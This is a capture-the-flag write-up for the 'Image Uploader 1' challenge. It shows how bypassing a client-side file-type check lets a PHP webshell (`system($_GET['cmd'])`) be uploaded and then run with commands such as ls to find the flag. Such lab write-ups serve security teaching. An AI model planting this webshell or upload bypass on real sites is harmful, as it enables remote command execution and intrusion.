Try   HackMD

[EN] Image Uploader 1

tags: Writeup Web English

FlyDragon

Step.1

http://lotuxctf.com:20008

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

It is a image uploader.

Upload a test.png , and you will get this message.

Uploaded at : uploads/64fd8aff877ba_test.png

Visit this path to view what we uploaded.

We can upload a php webshell to get the flag

Step.2

You can upload any file after modifying frontend code.

<input type="file" name="image" accept="image/*" required="">

Upload a shell.php.

<?php system($_GET["cmd"]); ?>

Visit the path and pass a parameter ?cmd=ls to use ls .

There is a flag.txt.

Last changed by 
LoTuX CTF
0
610

Read more

[CH] Cookie Stealer

[name=FlyDragon]

May 28, 2025
[EN] Cookie Stealer

[name=FlyDragon]

May 28, 2025
LoTuX CTF 投稿說明

在 LoTuX 平台上取得 2000 分以上

Apr 4, 2025
[EN] Rev C 2

[name=FlyDragon] Step.1 By observing output.txt and executing the code, it can be inferred that the program flag.exe will output the flag after shuffling it. Step.2 By examining main() using Ghidra, it can be discovered that this program reads in the contents of flag.txt and outputs them after performing specific swaps in a particular order. order = [5, 13, 0, 12, 1, 16, 3, 2, 8, 7, 15, 4, 6, 17, 11, 10, 9]

Nov 1, 2023
Read more from LoTuX CTF
Published on HackMD